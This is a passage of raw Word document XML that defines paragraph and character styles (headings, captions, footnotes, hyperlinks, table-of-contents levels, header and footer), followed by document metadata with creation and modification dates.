  <w:style w:type="character" w:styleId="957">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="958">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5a5a5a" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="959">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="960">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0e2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="961">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="981"/>
    <w:link w:val="962"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="962">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="961"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="963">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="964">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="981"/>
    <w:link w:val="965"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="965">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="964"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="966">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="967">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0563c1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="968">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="954f72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="969">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="970">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="971">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="972">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="973">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="974">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="975">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="976">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="977">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="978">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="979">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="980">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="981" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="982">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="400"/>
      <w:ind/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="983">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="360"/>
      <w:ind/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="984">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="320"/>
      <w:ind/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="434343"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="985">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="280"/>
      <w:ind/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="986">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="240"/>
      <w:ind/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="987">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="240"/>
      <w:ind/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="988" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="9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0" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="99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Title"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="60"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="993">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="320"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="994">
    <w:name w:val="Header"/>
    <w:basedOn w:val="981"/>
    <w:link w:val="995"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4513"/>
        <w:tab w:val="right" w:leader="none" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="995" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="994"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="996">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="981"/>
    <w:link w:val="997"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4513"/>
        <w:tab w:val="right" w:leader="none" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="997" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="99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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-21T00:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-12T08:11:08Z</dcterms:modified>
</cp:coreProperties>
</file>